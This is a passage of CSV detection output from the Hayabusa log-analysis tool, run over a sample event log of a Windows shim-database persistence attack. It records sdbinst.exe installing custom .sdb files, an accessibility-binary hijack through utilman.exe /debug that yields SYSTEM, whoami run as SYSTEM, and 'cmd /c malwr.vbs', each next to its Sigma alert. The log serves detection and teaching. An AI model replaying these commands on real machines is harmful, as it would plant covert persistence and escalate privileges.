Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.104 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3848 | PGUID: 365ABB72-5689-5C91-0000-0010A1420800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.104 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator 
(32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3848 | PGUID: 365ABB72-5689-5C91-0000-0010A1420800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.114 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 4012 | PGUID: 365ABB72-568A-5C91-0000-0010A6450800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.274 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 100 | PGUID: 365ABB72-568A-5C91-0000-0010484A0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.364 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 100 | PGUID: 365ABB72-568A-5C91-0000-0010484A0800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 4072 | PGUID: 
365ABB72-568A-5C91-0000-0010D24B0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:29.138 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2476 | PGUID: 365ABB72-568D-5C91-0000-001061560800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2548 | PGUID: 365ABB72-569F-5C91-0000-001012610800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.144 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{9aadf096-343f-4575-9514-4e5551e5ff19}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2548 | PGUID: 
365ABB72-569F-5C91-0000-001012610800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.144 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.144 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.154 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.164 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.164 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.164 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.294 +09:00,PC01.example.corp,11,info,,File Created,Path: 
C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3088 | PGUID: 365ABB72-569F-5C91-0000-00105C640800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.294 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3088 | PGUID: 365ABB72-569F-5C91-0000-00105C640800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.334 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3100 | PGUID: 365ABB72-569F-5C91-0000-00105F670800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3132 | PGUID: 365ABB72-569F-5C91-0000-0010036C0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility 
Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3140 | PGUID: 365ABB72-569F-5C91-0000-0010D96C0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:47.484 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3132 | PGUID: 365ABB72-569F-5C91-0000-0010036C0800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:50.268 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3312 | PGUID: 365ABB72-56A2-5C91-0000-0010D2770800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:56:05.149 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 3176 | PGUID: 365ABB72-5765-5C91-0000-001039030900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Users\user01\Desktop\titi.sdb"" | Process: 
C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2848 | PGUID: 365ABB72-57EC-5C91-0000-001097810900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:21.014 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2848 | PGUID: 365ABB72-57EC-5C91-0000-001097810900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:21.014 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:21.014 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:21.044 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:21.044 
+09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:21.054 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:21.054 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.214 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 384 | PGUID: 365ABB72-57F4-5C91-0000-0010F0910900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.294 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2892 | PGUID: 
365ABB72-57F4-5C91-0000-001083920900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.304 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3700 | PGUID: 365ABB72-57F4-5C91-0000-001070930900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:28.815 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 2604 | PGUID: 365ABB72-57F4-5C91-0000-0010BB9C0900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:31.860 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\system32\utilman.exe | PID: 3204 | PGUID: 365ABB72-57F7-5C91-0000-001008B30900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:31.860 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3204 | PGUID: 365ABB72-57F7-5C91-0000-001008B30900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:35.745 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""c:\osk.exe"" | Process: C:\osk.exe | User: NT 
AUTHORITY\SYSTEM | Parent Cmd: utilman.exe /debug | LID: 0x3e7 | PID: 2128 | PGUID: 365ABB72-57FB-5C91-0000-00104FD40900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""c:\osk.exe"" | LID: 0x3e7 | PID: 2456 | PGUID: 365ABB72-5804-5C91-0000-001044DE0900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:00:01.518 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\wsqmcons.exe | Process: C:\Windows\System32\wsqmcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2772 | PGUID: 
365ABB72-5851-5C91-0000-0010E1030A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:00:01.539 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Process: C:\Windows\System32\schtasks.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\wsqmcons.exe | LID: 0x3e7 | PID: 2716 | PGUID: 365ABB72-5851-5C91-0000-00107D050A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:10:34.489 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 792 | PGUID: 365ABB72-5ACA-5C91-0000-0010DC1E0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:18:54.257 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2884 | PGUID: 365ABB72-5CBE-5C91-0000-001017150C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:18:57.202 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3856 | PGUID: 
365ABB72-5CC1-5C91-0000-0010DD2F0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:20:32.298 +09:00,PC01.example.corp,13,medium,Persis,Registry Modification to Hidden File Extension,,rules/sigma/registry_event/win_re_hidden_extention.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:20:32.298 +09:00,PC01.example.corp,13,medium,Persis,Registry Modification to Hidden File Extension,,rules/sigma/registry_event/win_re_hidden_extention.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:21:05.306 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 3568 | PGUID: 365ABB72-5D41-5C91-0000-0010D9080F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:22:28.886 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | Process: C:\Windows\System32\rundll32.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3840 | PGUID: 365ABB72-5D94-5C91-0000-001080E90F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:22:33.593 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows NT\Accessories\WORDPAD.EXE"" ""C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb"" | Process: C:\Program Files\Windows 
NT\Accessories\wordpad.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | LID: 0x33435 | PID: 900 | PGUID: 365ABB72-5D99-5C91-0000-001051FA0F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:26:05.397 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2600 | PGUID: 365ABB72-5E6D-5C91-0000-001073BA1000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:26:08.852 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x33435 | PID: 2760 | PGUID: 365ABB72-5E70-5C91-0000-00107EBE1000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:31:05.509 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 572 | PGUID: 365ABB72-5F99-5C91-0000-0010B5421100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:36:05.610 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 
0x33435 | PID: 1748 | PGUID: 365ABB72-60C5-5C91-0000-001061C31100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:05.702 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2400 | PGUID: 365ABB72-61F1-5C91-0000-0010554C1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:11.440 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3364 | PGUID: 365ABB72-61F7-5C91-0000-001032511200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.EXE /c malwr.vbs | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x33435 | PID: 2340 | PGUID: 365ABB72-61FD-5C91-0000-0010536A1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:17.339 